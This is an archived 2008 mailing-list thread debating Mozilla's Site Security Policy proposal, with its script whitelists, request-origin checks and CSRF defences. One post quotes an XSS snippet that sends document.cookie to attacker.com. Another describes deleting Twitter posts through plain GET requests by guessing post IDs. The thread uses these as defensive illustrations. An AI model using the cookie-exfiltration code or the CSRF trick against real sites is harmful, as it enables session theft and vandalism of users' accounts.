Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

Site Security Policy

5 views
Skip to first unread message

bsterne

unread,
Jun 4, 2008, 2:46:42 PM6/4/08
to
I've recently published a proposal for Site Security Policy, a
framework for allowing sites to describe how content in their pages
should behave (thanks, Gerv):

http://people.mozilla.com/~bsterne/site-security-policy

I'm creating a placeholder for any discussion that comes out of that
publication. I hope to collect here people's ideas for proposed
functionality as well as other details which may be useful in creating
a common specification.

Gervase Markham

unread,
Jun 5, 2008, 1:40:51 PM6/5/08
to
bsterne wrote:
> http://people.mozilla.com/~bsterne/site-security-policy

This is an interesting proposal. Here are some thoughts:

- Are we concerned about the bandwidth used by the additional headers,
or are the days of worrying about a few bytes overhead per request long
past?

- I am concerned about the performance implications of making a
preliminary HEAD request for every cross-site resource, which is needed
to enable Request-Source. Has this been analysed at all?

The impact would be significantly reduced if we were to do such checks
only for unsafe HTTP verbs (i.e. POST rather than GET). The vast
majority of cross-site requests (e.g. images, searches) are GETs.

- "When any Script-Source instruction is received by the browser script
enforcement mode is enabled and only white-listed hosts will be treated
as valid sources of script for the page. Any script embedded within the
page and any script included from non-white-listed hosts will not be
executed."

This means that all script has to be in external .js files. (This is one
of the differences in approach from Content-Restrictions.) While this is
an encouragement of best practice in JS authorship (unobtrusive script,
addition of event handlers using addEventListener() and so on) would
site authors find it too restrictive?

- I am assuming that the script-removal required by Script-Source would
be done at parse time. Is that correct?

- Is it worth having a special value for Script-Source and
Request-Target, such as "domain", to enable all sites in the same domain
(as defined by the Public Suffix List, http://www.publicsuffixlist.org)
to receive requests, rather than making the site owner list them explicitly?

- Report-URI is a truly fantastic idea. It should support page- and
site-relative URIs too, in order to keep the header size down. e.g.
Report-URI: /error-collector.cgi

- Perhaps via an extension, the browser could also support notifying the
user/web developer of policy violations.

- Can you more carefully define the relative priority and order of
application of allow and deny rules in e.g. Script-Source?

- Do you plan to permit these policies to also be placed in <meta
http-equiv=""> tags? There are both pros and cons to this, of course.

Hope that's helpful :-)

Gerv

danberall

unread,
Jun 5, 2008, 4:45:45 PM6/5/08
to
> - Do you plan to permit these policies to also be placed in <meta
> http-equiv=""> tags? There are both pros and cons to this, of course.

Might it be a valuable idea to support a similar reference mechanism
to the way that the P3P compact policy is supported?

:: The location of the policy reference file can be indicated using
one of four mechanisms. The policy reference file
:: 1. may be located in a predefined "well-known" location, or
:: 2. a document may indicate a policy reference file through an
HTML link tag, or
:: 3. a document may indicate a policy reference file through an
XHTML link tag, or
:: 4. through an HTTP header.

(See http://www.w3.org/TR/P3P/#ref_syntax.)

A similar hierarchy could be implemented and using a "known location"
would address the bandwidth issue for sites that have this concern. I
do agree that there are specific cons to allowing tags within the HTML
source. Perhaps an overarching policy declaration could be
implemented in the "known location" that allows or disallows the HTML
or XHTML tag.

As Gerv has previously proposed, I also would like to see some form of
Content Restrictions implemented (http://www.gerv.net/security/content-
restrictions/). I'm thinking specifically of the "header" option. I
wonder if forcing all the JavaScript content to be externally
referenced could be too restrictive for some application models. It
might be acceptable for some organizations to assume the risk of
allowing JavaScript solely into the HTML head of the page as this
would allow page specific event handlers to be more easily delivered.
While user supplied data sometimes does occur between the head tags,
this risk might appear acceptable for some applications.

Thanks.
Danny

Gervase Markham

unread,
Jun 6, 2008, 5:05:02 AM6/6/08
to
danberall wrote:
> A similar hierarchy could be implemented and using a "known location"
> would address the bandwidth issue for sites that have this concern.

Leaving aside the merits or otherwise of the rest of your suggestion,
"Known location" is generally bad - it means we put loads of 404 errors
in the log of sites which don't have such a file. This is the way
favicons work, and site developers hate it.

Gerv

boba...@gmail.com

unread,
Jun 6, 2008, 4:23:53 PM6/6/08
to

One of the most important features lacking IMHO is the ability to
restrict what hosts that are 'script src'd' can do. Currently they
have full DOM access
which is contributing towards drive by malware on ad networks and
other nastiness. We need the ability to allow Javascript to be hosted
on a third party domain, but to restrict what resources that JS can
access. For example allow an ad network to create image objects with
links, but disallow cookie access or redirections. Lots of
possibilities here.

We also should discuss restrictions of certain technologies from being
used. For example instruct the browser to disallow ActiveX/Flash/
applets/JavaFX/Silverlight to execute on the domain unless explicitly
defined in the policy as an allowed behavior. Sure the browser has no
ability to restrict what flash/other technologies can do once they are
started but they can restrict them from being loaded/called in the
first place.

There are additional discussions going on at
http://jeremiahgrossman.blogspot.com/2008/06/site-security-policy-open-for-comments.html
discussing this topic as well.

Great to see this moving forward.

Regards,
- Robert Auger
http://www.webappsec.org/


Nils Maier

unread,
Jun 7, 2008, 7:47:10 PM6/7/08
to

I just "stumbled" through the code and noticed a few things and have a
few suggestions:

* a lot of reinvent the wheel code is in there, like getHostFromURL
(instead of using nsIURI/nsIURL/nsIEffectiveTLDService).

* A regex-based homebrown html parser. I wonder how good it is, how good
it will get... Bad people are known th be quiet creative when it comes
to finding ways to obscure injections. (http://php-ids.org/)
I know getting this right is quiet tricking, I implemented such thing
myself, but after some month somebody figured out how to circumvent it...
I don't know if there is relyable a way to "hijack" the DOM before any
scripts are executed, but I guess this would be a better approach as you
then get what the rendering engine gets as well.

* External scripts might be prohibited from loading by implementing
nsIContentPolicy (like Adblock Plus does for example, and I think
noscript does as well.)

* clean = this.data.replace(/google/ig,'yahoo'); Huh? Prototyping, eh? ;)

* this.status = "On" | "Off"... What happened to booleans?

Interesting idea indeed. Glad somebody started to implement it.
Maybe you should get in touch with Giorgio of noscript fame. He is very
knowledgable in this area and furthermore I think it might be
interesting to implement this in noscript as well to some extent.

Cheers
Nils

Gervase Markham

unread,
Jun 9, 2008, 5:20:23 AM6/9/08
to
boba...@gmail.com wrote:
> One of the most important features lacking IMHO is the ability to
> restrict what hosts that are 'script src'd' can do. Currently they
> have full DOM access
> which is contributing towards drive by malware on ad networks and
> other nastiness.

Not if the ads are in an <iframe>, surely?

> We need the ability to allow Javascript to be hosted
> on a third party domain, but to restrict what resources that JS can
> access. For example allow an ad network to create image objects with
> links, but disallow cookie access or redirections. Lots of
> possibilities here.

I believe Hixie has recently proposed some HTML5 additions in this area.
Have you seen them?

Gerv

Terri

unread,
Jun 9, 2008, 3:40:18 PM6/9/08
to
We've been doing some very similar work here in the Carleton Computer
Security Lab over the past year, and we put out a tech report in April
that I think would be really helpful:

http://www.scs.carleton.ca/research/tech_reports/index.php?Abstract=tr-08-07_0007&Year=2008

For one, we did a bunch of analysis of the security and performance of
our system that will be interesting to you and possibly some of the
numbers will also apply to SSP.

There's a lot of small differences between our proposals, and I'd like
to point out some differences between our "soma-approval" and your
"request-source" that are important:

(1) Because the request-source query involves getting the headers for
the resource, it can still be used as a security leak to get
information out of the browser by placing it in the URI.

(2) Request-source is on a per-resource basis. Soma-approval is done
on a per-site basis. We have some estimated performance numbers that
might be very interesting to you here, because we clocked in around
13% overhead without caching (6% with an estimated caching rate).
These were overestimations based on average load times per site, but
there's some prelim numbers for the Gervase, who asked about them.

My colleagues and I would really love to see this sort of policy
implemented in browsers, and it would be great if we could help
produce a specification that is workable and secure. There's all
sorts of little things I'd like to discuss, but I think it makes more
sense to let you read our report first.

brandon...@gmail.com

unread,
Jun 10, 2008, 2:35:07 PM6/10/08
to
On Jun 5, 10:40 am, Gervase Markham <g...@mozilla.org> wrote:
> - Are we concerned about the bandwidth used by the additional headers,
> or are the days of worrying about a few bytes overhead per request long
> past?

I am not particularly concerned with the additional bandwidth, nor
have I heard any specific objections in that area. I think that a
larger impact may be created, though, by the additional round trips
required by the CSRF aspects of the proposal (which you bring up
below).

> - I am concerned about the performance implications of making a
> preliminary HEAD request for every cross-site resource, which is needed
> to enable Request-Source. Has this been analysed at all?

Analyzed, no... but I agree that the Request-Source checks should only
be made for non-safe methods. The proposal includes that statement,
though perhaps it could have been made more prominently:
http://people.mozilla.com/~bsterne/site-security-policy/details.html#non-safe

> The impact would be significantly reduced if we were to do such checks
> only for unsafe HTTP verbs (i.e. POST rather than GET). The vast
> majority of cross-site requests (e.g. images, searches) are GETs.

I totally agree.

> - "When any Script-Source instruction is received by the browser script

> enforcement mode is enabled ..."


>
> This means that all script has to be in external .js files. (This is one
> of the differences in approach from Content-Restrictions.) While this is
> an encouragement of best practice in JS authorship (unobtrusive script,
> addition of event handlers using addEventListener() and so on) would
> site authors find it too restrictive?

This is admittedly the most cumbersome aspect of the proposal for site
authors. The assumptions I have been going on that led to this model
are twofold:
1. It is extremely difficult to differentiate "intended" inline
script from "injected" inline script and a clear boundary can be
established if we simply require that all JavaScript be included from
external files from white-listed hosts.
2. Sites that wish to utilize Site Security Policy will perhaps be
willing to do more work in reorganizing their pages, at least for
those resources that they consider "sensitive" enough to justify using
SSP.

> - I am assuming that the script-removal required by Script-Source would
> be done at parse time. Is that correct?

Yes. The add-on that I wrote is a total hack (see Nils' comments
below) and is for proof-of-concept purposes only. A permanent
implementation (for Mozilla) will likely be a patch to the HTML and
XML parsers that creates a mode for disabling inline and non-white-
listed scripts which can be toggled on or off per a site's policies.

> - Is it worth having a special value for Script-Source and
> Request-Target, such as "domain", to enable all sites in the same domain

> (as defined by the Public Suffix List,http://www.publicsuffixlist.org)


> to receive requests, rather than making the site owner list them explicitly?

Yes. I think this is worthwhile and would be useful, for example, for
authors whose content may be subject to move periodically and who
don't want to hard code server names into their policies.

> - Perhaps via an extension, the browser could also support notifying the
> user/web developer of policy violations.

Yes, that would be very easy to support as well and would provide
useful information to interested users.

> - Can you more carefully define the relative priority and order of
> application of allow and deny rules in e.g. Script-Source?

Yes. I made comments in the add-on code that does this, but you're
right that it should be explained in the proposal as well. For
example, if a host matches any deny rule, that rule will take
precedence over any rule allowing the host.

> - Do you plan to permit these policies to also be placed in <meta
> http-equiv=""> tags? There are both pros and cons to this, of course.

Yes, I've thought about this as well, and I think http-equiv will
probably be useful for the set of users who don't have CGI privileges
on their server and can't set custom headers the traditional way.

Also, I'm seeing a lot of suggestions/requests (off newsgroup mostly)
that policies be defined in an external file rather than via headers.
This would obviously be closer to Adobe's Flash model. I have heard
you, in this discussion and previously, bring up the issue of the log
spam created by all the 404s generated in sites that don't have a
policy file. What about the following idea (from Dan Veditz): If a
server wants to set Site Security Policy, it sends a HTTP header or
http-equiv meta tag that points the user agent to the location where
the policy file sits.

Thoughts?

> Hope that's helpful :-)

It is, as always.

Cheers,
Brandon

brandon...@gmail.com

unread,
Jun 10, 2008, 2:54:25 PM6/10/08
to
On Jun 7, 4:47 pm, Nils Maier <Maier...@web.de> wrote:
> * a lot of reinvent the wheel code is in there, like getHostFromURL
> (instead of using nsIURI/nsIURL/nsIEffectiveTLDService).
>
> * A regex-based homebrown html parser. I wonder how good it is, how good
> it will get... Bad people are known th be quiet creative when it comes
> to finding ways to obscure injections...

Thank you for your interest and scrutiny here, Nils. As I mentioned
in my reply to Gerv, the add-on is only a proof-of-concept hack and
differs greatly from the approach Mozilla would likely take in a
permanent implementation. A regex-based HTML and script parser was a
quick and dirty way to get the job done. We have thousands of
developer hours already invested in our HTML and XML parsers. I would
not want to reimplement any of that code when it's already been so
rigorously tested.

> * clean = this.data.replace(/google/ig,'yahoo'); Huh? Prototyping, eh? ;)
>
> * this.status = "On" | "Off"... What happened to booleans?

Yep, thanks for pointing these out. Both have been fixed and the add-
on package updated.

> Maybe you should get in touch with Giorgio of noscript fame. He is very
> knowledgable in this area and furthermore I think it might be
> interesting to implement this in noscript as well to some extent.

I am sure that Giorgio will be involved in the design/implementation.
He has already provided some useful comments on a few of the
discussions I have seen.

Thanks,
Brandon

Gervase Markham

unread,
Jun 12, 2008, 6:56:33 AM6/12/08
to
bst...@mozilla.com wrote:
> Analyzed, no... but I agree that the Request-Source checks should only
> be made for non-safe methods. The proposal includes that statement,
> though perhaps it could have been made more prominently:
> http://people.mozilla.com/~bsterne/site-security-policy/details.html#non-safe

Yes; I think the current write-up is confusing on this point.

>> This means that all script has to be in external .js files. (This is one
>> of the differences in approach from Content-Restrictions.) While this is
>> an encouragement of best practice in JS authorship (unobtrusive script,
>> addition of event handlers using addEventListener() and so on) would
>> site authors find it too restrictive?
>
> This is admittedly the most cumbersome aspect of the proposal for site
> authors. The assumptions I have been going on that led to this model
> are twofold:
> 1. It is extremely difficult to differentiate "intended" inline
> script from "injected" inline script and a clear boundary can be
> established if we simply require that all JavaScript be included from
> external files from white-listed hosts.

My attempt at making such a differentiation is here:
http://www.gerv.net/security/script-keys/

But perhaps it's unnecessary. It would be useful to get web developer
feedback on this point. If it is too cumbersome, the proposal will not
be adopted. Perhaps we could take it to the WASP or other
web-development forums for discussion?

> 2. Sites that wish to utilize Site Security Policy will perhaps be
> willing to do more work in reorganizing their pages, at least for
> those resources that they consider "sensitive" enough to justify using
> SSP.

My desire in writing Content-Restrictions (although this may have got
somewhat obscured as the spec evolved) was that the gains were
incremental - the more work you did, the more benefit you'd gain. So you
could just add a header encoding what your site does now, for some
protection, or you could rearrange the site for greater protection. Half
a loaf is better than no bread.

>> - Can you more carefully define the relative priority and order of
>> application of allow and deny rules in e.g. Script-Source?
>
> Yes. I made comments in the add-on code that does this, but you're
> right that it should be explained in the proposal as well. For
> example, if a host matches any deny rule, that rule will take
> precedence over any rule allowing the host.

OK. When might we expect an update?

>> - Do you plan to permit these policies to also be placed in <meta
>> http-equiv=""> tags? There are both pros and cons to this, of course.
>
> Yes, I've thought about this as well, and I think http-equiv will
> probably be useful for the set of users who don't have CGI privileges
> on their server and can't set custom headers the traditional way.

Right. It would require a parsing restart, just as a charset change I
believe still does. But that's an unavoidable penalty.

> Also, I'm seeing a lot of suggestions/requests (off newsgroup mostly)
> that policies be defined in an external file rather than via headers.
> This would obviously be closer to Adobe's Flash model. I have heard
> you, in this discussion and previously, bring up the issue of the log
> spam created by all the 404s generated in sites that don't have a
> policy file. What about the following idea (from Dan Veditz): If a
> server wants to set Site Security Policy, it sends a HTTP header or
> http-equiv meta tag that points the user agent to the location where
> the policy file sits.

Could do. Although if we are doing that, perhaps the <link> tag might be
a more appropriate method in HTML.

Have you thought about how much SSP applies to non-HTML (e.g. XML)
content? I tried to make Content Restrictions generalizable, at least in
principle, to other sorts of content which contained embedded script or
embedded documents.

Gerv

Gervase Markham

unread,
Jun 12, 2008, 7:07:05 AM6/12/08
to
Terri wrote:
> There's a lot of small differences between our proposals,

And some big ones, if (for example) SSP ends up restricted to POST.

> and I'd like
> to point out some differences between our "soma-approval" and your
> "request-source" that are important:
>
> (1) Because the request-source query involves getting the headers for
> the resource, it can still be used as a security leak to get
> information out of the browser by placing it in the URI.

True. SSP in its current form is not a mechanism for locking down all
page communications.

> (2) Request-source is on a per-resource basis. Soma-approval is done
> on a per-site basis. We have some estimated performance numbers that
> might be very interesting to you here, because we clocked in around
> 13% overhead without caching (6% with an estimated caching rate).
> These were overestimations based on average load times per site, but
> there's some prelim numbers for the Gervase, who asked about them.

Are those page load time increases? It could just be the implementation
mechanism you used, but I would suspect that either number would be
unacceptable here. Even 1% is a big deal. The headers approach has the
significant advantage of no page load increase just through deployment;
the delay comes when you try and make a cross-domain POST.

The restriction of SSP to POST also means that it wouldn't be useful to
prevent "bandwidth stealing".

Gerv

Terri

unread,
Jun 13, 2008, 5:49:19 PM6/13/08
to
On Jun 12, 7:07 am, Gervase Markham <g...@mozilla.org> wrote:
>True. SSP in its current form is not a mechanism for locking down all
>page communications

Shouldn't it be? Site admins will already have to provide all the
necessary information in order to be SSP compliant, so it makes sense
to me to give them extra protection.

The only reason I can think of not to do this is if the implementation
turns out to have a huge overhead, but although I was disappointed
with our estimated numbers, I'm confident we can reduce those in
practice. (see below.)

> > 13% overhead without caching (6% with an estimated caching rate).
> > These were overestimations based on average load times per site,

> Are those page load time increases? It could just be the implementation
> mechanism you used, but I would suspect that either number would be
> unacceptable here. Even 1% is a big deal. The headers approach has the
> significant advantage of no page load increase just through deployment;
> the delay comes when you try and make a cross-domain POST.

Those are estimations of round-trip times, once per cross-domain, to
get a policy file. They did not come from our implementation at all.
They are because of network delay, not processing time.

I'd say that these are very inflated numbers because we used the
average request time for a given site, even though most of the files
loaded from a given site would be much bigger than any policy file.
They can probably be treated as a maximum load increase. Note: our
test cases included some sites with very high latency, which probably
brought that 6% average increase up even higher than it would be if
you weren't, say, getting info from a very laggy site in France as we
were.

With smaller policy files (or headers), the cost should be fairly
minimal, but I would say we should do some tests before assuming that
it's going to be negligible, especially if you're talking about adding
headers to everything. If we restricted our proposal to POST
requests, as proposed for SSP, then we end up with very similar
estimated performance numbers.

> The restriction of SSP to POST also means that it wouldn't be useful to
> prevent "bandwidth stealing".

It also means that it wouldn't be that useful to prevent cross site
request forgery (realistically, "safe" operations aren't unless your
web programmers abide by them, and I would venture that many don't).

Gervase Markham

unread,
Jun 17, 2008, 9:25:29 AM6/17/08
to
Terri wrote:
> On Jun 12, 7:07 am, Gervase Markham <g...@mozilla.org> wrote:
>> True. SSP in its current form is not a mechanism for locking down all
>> page communications
>
> Shouldn't it be?

What's the use case for locking down all page communications?

> Site admins will already have to provide all the
> necessary information in order to be SSP compliant, so it makes sense
> to me to give them extra protection.

Total lockdown is a side-effect of a particular implementation strategy.
If you can provide a use case, it may influence which strategy is used.

>> The restriction of SSP to POST also means that it wouldn't be useful to
>> prevent "bandwidth stealing".
>
> It also means that it wouldn't be that useful to prevent cross site
> request forgery (realistically, "safe" operations aren't unless your
> web programmers abide by them, and I would venture that many don't).

I would venture that most do. Doing a web purchase via a GET runs into
problems with e.g. the user doing a Reload.

Gerv

Terri

unread,
Jun 23, 2008, 11:47:25 AM6/23/08
to
On Jun 17, 9:25 am, Gervase Markham <g...@mozilla.org> wrote:
> What's the use case for locking down all page communications?

The traditional one: XSS cookie-stealing attacks like this:

var image = new Image();
image.src= ’http://attacker.com/log.php?cookie=’ +
encodeURIComponent(document.cookie);

A more modern one: iframe injections
eg: http://www.webpronews.com/topnews/2008/03/28/major-sites-hit-with-iframe-injection-attacks

> > It also means that it wouldn't be that useful to prevent cross site
> > request forgery (realistically, "safe" operations aren't unless your
> > web programmers abide by them, and I would venture that many don't).
> I would venture that most do. Doing a web purchase via a GET runs into
> problems with e.g. the user doing a Reload.

We did some tests in the lab and in a quick check of a few retailers
didn't find sites that would allow you to complete web purchases with
GET requests, but we found several places (I believe thinkgeek and
maple music were some of the targets) that let you add to a cart with
GETs, so we can't really claim that GET requests do nothing to change
the state of a given web application, even though I believe the specs
say they shouldn't.

I hadn't been thinking about purchases, though: I was actually
thinking in terms of using GET requests to add comments/forum posts to
a site, which I have seen, and could be used to make self-propagating
web-worms a la Samy, to insert iframe exploits in vulnerable sites, or
just to use users' credentials to post spam including links to
dangerous sites.

Terri

unread,
Jun 23, 2008, 12:16:33 PM6/23/08
to
Oh, I should probably also mention that we did an HTML conversion of
the tech report, so if anyone hates reading PDFs or just prefers HTML
(I know a surprising number of people who do), you can check it out
either on my university website:
http://www.scs.carleton.ca/~toda/doc/soma/

or my personal one:
http://terri.zone12.com/doc/academic/soma/

Gervase Markham

unread,
Jun 24, 2008, 5:04:26 AM6/24/08
to
Terri wrote:
> On Jun 17, 9:25 am, Gervase Markham <g...@mozilla.org> wrote:
>> What's the use case for locking down all page communications?
>
> The traditional one: XSS cookie-stealing attacks like this:
>
> var image = new Image();
> image.src= ’http://attacker.com/log.php?cookie=’ +
> encodeURIComponent(document.cookie);

But you are confusing Request-Source and Request-Target.

Request-Target is a set of headers shipped with the page; it would
prevent contacting attacker.com at all.

This thread thusfar has been about Request-Source. You said:

"(1) Because the request-source query involves getting the headers for
the resource, it can still be used as a security leak to get information
out of the browser by placing it in the URI."

It's true that information travels this way, but the "leaky" request
will never be made unless attacker.com is in the Request-Target
whitelist. So there is no leak.

> We did some tests in the lab and in a quick check of a few retailers
> didn't find sites that would allow you to complete web purchases with
> GET requests, but we found several places (I believe thinkgeek and
> maple music were some of the targets) that let you add to a cart with
> GETs, so we can't really claim that GET requests do nothing to change
> the state of a given web application, even though I believe the specs
> say they shouldn't.

So there's a possible risk for people who don't review the contents of
their cart before hitting "Buy"? :-)

> I hadn't been thinking about purchases, though: I was actually
> thinking in terms of using GET requests to add comments/forum posts to
> a site, which I have seen,

Really? I can't remember seeing this either. But perhaps I wasn't paying
attention.

> and could be used to make self-propagating
> web-worms a la Samy, to insert iframe exploits in vulnerable sites, or
> just to use users' credentials to post spam including links to
> dangerous sites.

Again, Request-Target is the mitigating step here.

Gerv


Terri

unread,
Jun 24, 2008, 1:02:55 PM6/24/08
to
> It's true that information travels this way, but the "leaky" request
> will never be made unless attacker.com is in the Request-Target
> whitelist. So there is no leak.

Ah! You're right, I had confused that for some reason. If all
requests are still covered by Request-Target, then we're good for that
kind of leak. (I was somehow thinking that you were talking about
checking only POST requests, which was why the concern.)

Looking at it again, the thing I think might be missing from Request-
Target is the "other side" that you do for scripts with Request-Source
(or that flash does with crossdomain.xml). There's no way for the
external content provider to say "no, that's an action-causing script,
we don't let other people use that" on requests that are "safe". I
think if you put that in, you'd be able to stop more XSRF than you can
with only the one check.

Example:
1. A portal site includes info from a social networking site (ie -
your friends' latest updates).
2. It puts *.social into its Request-Target list because it wants
things to "just work" and that seems easiest.
3. Said portal site has an XSS exploit and someone inserts XSRF code
for use on the social site.
4. It works when someone visits that page.

If the social site can use Request-Source so say "no" when someone
tries to do a GET on say *.action.social, then we can block a few more
attacks. But Request-Source doesn't cover GET requests.

>So there's a possible risk for people who don't review the contents of
>their cart before hitting "Buy"? :-)

*laugh* I know, the prospect is terrifying. ;)

But adding an item to a cart and adding a friend are very similar
actions, and the latter might have privacy implications. I've
definitely seen a simple karma-adding exploit on Joomla. Which is
just amusing and harmless unless, for example, you're using that karma
to determine whose stories get auto-posted to the front page of a
site.

And as I said, I've seen forum software (my fuzzy memory says it was
also joomla, but it could have been phpbb or another package) that
allowed posting using a GET request (because there was no check to see
if the variables came in through post or GET -- php is awfully
friendly to this...).

Terri

Terri

unread,
Jun 24, 2008, 1:59:41 PM6/24/08
to
Messed around a bit and noticed that you can indeed post using a GET
request to Twitter. This looks to be somewhat XSRF protected with a
authorization token, so hopefully it's not dead simple to exploit.

However, the delete requests are just simple GETs of the form
http://twitter.com/status/destroy/842624743

I just loaded that URL separately in my browser and it deleted the
associated post since I was log in. It doesn't work if I try to
delete other people's posts, but I *can* get their post numbers out of
the HTML if I wanted to target someone. Or you could just run through
random numbers and delete random posts if one matched up.

Twitter was the 3rd site I tried to exploit in this manner (the joomla-
running site and the phpbb-running site were thankfully both resistant
to me posting using GETs).

I'd say if it takes me that little time to find one... GET requests
probably aren't as safe as the specs say they are.

brandon...@gmail.com

unread,
Jun 24, 2008, 2:42:23 PM6/24/08
to
On Jun 12, 3:56 am, Gervase Markham <g...@mozilla.org> wrote:

> bste...@mozilla.com wrote:
> > Analyzed, no... but I agree that the Request-Source checks should only
> > be made for non-safe methods.
> Yes; I think the current write-up is confusing on this point.

I've updated the proposal to make this aspect a bit more clear:
http://people.mozilla.org/~bsterne/site-security-policy/details.html

> >> This means that all script has to be in external .js files. (This is one
> >> of the differences in approach from Content-Restrictions.) While this is
> >> an encouragement of best practice in JS authorship (unobtrusive script,
> >> addition of event handlers using addEventListener() and so on) would
> >> site authors find it too restrictive?

One interesting proposal I have been sent via private email was from
Amit Klein, who suggests potentially allowing authors to include a
single, zero-parameter function within event-handling attributes,
which could be defined in an external file. From his email:

"""
Perhaps you should allow something like a single parameter-less
function invocation inside handlers, e.g. allow this:

<img id="img123" onClick="onclickhandlerfoo()">

Obviously you can't allow parameterized functions, as this will open
up security holes, e.g.

eval("something bad")

or

innocent_function(123,eval("bad stuff here"),456)
"""

I really like this idea, as I think it lowers the barrier to entry to
use Site Security Policy. I think (though don't have data to back
this up) that there are a fair number of authors who would be
comfortable moving their JS function definitions to external files,
but wouldn't necessarily be comfortable attaching their own event
listeners to DOM objects. This might be a great middle-ground
solution.

> >> - Can you more carefully define the relative priority and order of
> >> application of allow and deny rules in e.g. Script-Source?

I also updated the proposal to be more clear about relative rule
priorities.

> Have you thought about how much SSP applies to non-HTML (e.g. XML)
> content? I tried to make Content Restrictions generalizable, at least in
> principle, to other sorts of content which contained embedded script or
> embedded documents.

Yes, I think that SSP should generalize to other document types,
certainly XML, that can contain active content. When I get a few
moments, I will also make this more clear in the proposal.

Thanks, Gerv, for the feedback, and I will keep you and the other
participants in this discussion updated as we move toward creating an
open standard (W3, WHATWG, etc.).

Incidentally, I have been receiving some really great, detailed
feedback from various security researchers (mostly private email at
this point) and I hope to persuade them to join the standard-creating
process.

Cheers,
Brandon

Gervase Markham

unread,
Jun 25, 2008, 7:48:42 AM6/25/08
to
Terri wrote:
> There's no way for the
> external content provider to say "no, that's an action-causing script,
> we don't let other people use that" on requests that are "safe".

That's right - because if there was, we'd have to do checks on every
cross-domain request a page made. And the performance impact of all the
HEAD requests would be significant.

If the implementation were to switch from that to a single policy file,
such as crossdomain.xml, then that problem would be eliminated - but a
set of different problems would be created.

Again, I think we need to focus on the fact that SSP is a
belt-and-braces approach. If you use sensible coding practices, it helps
you when there's a slip-up. If you do non-idempotent operations using
GET, then (the current formulation, at least) doesn't help you.

Gerv

Gervase Markham

unread,
Jun 25, 2008, 8:22:09 AM6/25/08
to
bst...@mozilla.com wrote:
> I've updated the proposal to make this aspect a bit more clear:
> http://people.mozilla.org/~bsterne/site-security-policy/details.html

The documentation for Request-Source is now more complete, but it's a
bit jumbled. I would make bullet 4 into bullet 2, and remove the second
sentence because it's repeated in (new) bullet 3.

The allow/deny priority system: is that the same as used by e.g.
.htaccess? If not, should it be?

You didn't include the feature of a special value for the local domain.
Can we abuse localdomain and localhost, or would those be supposed to
refer to the user's computer rather than the server?
X-SSP-Script-Source: allow *.localdomain
X-SSP-Script-Source: allow localhost

I note that in Content-Restrictions, I used "this":
X-SSP-Script-Source: allow this

We might also consider a special value for Script-Source of "head", if
we are looking for ways to make it more palatable and
easily-implementable for web authors.
X-SSP-Script-Source: allow head; allow *.example.com; deny
public.example.com

You may want to consider rethinking the names of the headers. At the
moment, you would expect Script-Source and Request-Source to be
parallel, but in fact Script-Source does something very similar to
Request-Target, but just for script. (You need to include a note that,
presumably, the restrictions are combined for script - the script access
has to be allowed by both if both are present.) As the words Source and
Target can be ambiguous, I would therefore suggest:

SSP-Script-Host
SSP-Request-Origin
SSP-Request-Host
SSP-Report-URI

We do need to continue to think about the performance impact of
Request-Source/Request-Origin. One option would be to have the site able
to return a policy file in the body of the response to a HEAD request,
which would define policy for that request and the entire site as well.
This avoids the "well-known URL" problem, and gives the option of both
page-specific responses and a general response. Again, perhaps a middle
ground.

> One interesting proposal I have been sent via private email was from
> Amit Klein, who suggests potentially allowing authors to include a
> single, zero-parameter function within event-handling attributes,
> which could be defined in an external file.

Hmm...

It's not quite that simple. See the quirksMode.org page on inline event
handlers:
http://www.quirksmode.org/js/events_early.html

If you want to permit suppression of the default action using an inline
style, you may need to allow at least "return functionWithNoParams()".
There are other ways to prevent the default action, but this one is
quite familiar to people.

Also, people often want to pass "this" or "event" to their event
handlers so they know which item was clicked on or have access to event
properties. More info on the latter here:
http://www.quirksmode.org/js/events_access.html

It's beginning to look like this might not fly...

Gerv

glenn....@gmail.com

unread,
Jul 10, 2008, 11:47:02 AM7/10/08
to
Thought I'd get involved in the conversation (full disclosure: I'm
involved with the SOMA paper that Terri has been discussing).

The point of both lines of work (both yours and ours) is to attempt to
restrict the number of XSS and XSRF vulnerabilities which exist in the
web today. We have gone about it in different ways, both of which
have merrit in each of their own areas. With our approach, the
configuration is centralized, and does not rely on developers to
differentiate between safe and unsafe operations. With your approach,
the network overhead is less and you allow configuration on a per-page
granularity.

In terms of the safe vs. unsafe requests, perhaps I can lend some
insight. The whole reason we have these XSS and XSRF attacks in the
first place is because developers have messed up. XSS 'can' be solved
by proper input validation, and XSRF attacks 'can' be solved by using
random identifiers in the links that perform an operation or examining
the Referer HTTP header. The problem is that although solutions exist
to both of these problems, developers have not properly implemented
the solution. With your approach of SSP and safe requests, you are
again relying on the developer to use the solution correctly, and put
all modifications behind a POST request. You have not removed the
reliance on the developer to code correctly, just simply shifted it to
a different 'thing' that they have to do. From previous conversation
with Terri, asking for an example of where a GET request can be used
to affect change on a web-site is asking for us to find a security
vulnerability in a website, since this is basically the definition of
a XSRF. Large sites are going to be well protected against this type
of thing, but I'm sure if you look at any of the recent CERT
vulnerabilities regarding XSRF or XSS you'll notice that they are all
exploitable through GET requests. In our work, we realized that the
developer could not be relied upon to do things correctly all the time
and hence we chose the approach of protecting against GET requests.

Related to the POST vs. GET arguments above is the fact that the only
way of doing a POST request currently is by submitting a form. While
browsers have gotten better at being able to customize the appearance
of a submit button, they are still in no way perfect, and hence some
of the visual style approaches that are possible on things like
<a>...</a> are not possible on the <input> submit element. The re-
arranging of the text (going from between the opening and closing <a>
element to inside the value attribute of the input element) also
contains several restrictions. A lot of HTML is usable inside the <a>
and </a> but only plain-text is allowed inside the value attribute of
the input element. This may have potential side-effects for visually
impaired users and other groups as well. I don't believe we can quite
rely on JavaScript yet to solve this either, as a lot of screen
readers don't support full JavaScript. The way I see it, in order to
make a usable site which is also visually appealing, the only choice
right now is GET.

It would be good to work together to come out with a policy that
protects against XSS and XSRF. Both our proposals attempt to do this,
but in slightly different ways. Is it possible to combine features of
both in developing an even better solution? I'm willing to work with
you to accomplish this goal.

We have posted our code on our website (http://ccsl.carleton.ca/
software/soma). We believe our code may be of use to you, as we
encountered some of the same issues in attempting to write a policy
checker add-on. Your implementation would probably be easier if you
implemented the shouldLoad method of the nsIContentPolicy interface
(and just checked for TYPE_SCRIPT) instead of attempting to parse to
find the <script> tags. This interface also allows you to easily
implement enforcement of the other headers involved in your proposal.

In conclusion: We need to make sure that SSP benefits developers who
are not security concious (because there SSP will prevent the most
vulnerabilities). While the temptation is there to assume the
developer will code securely, that assumption is the whole reason we
have XSS and XSRF in the first place.

bsterne

unread,
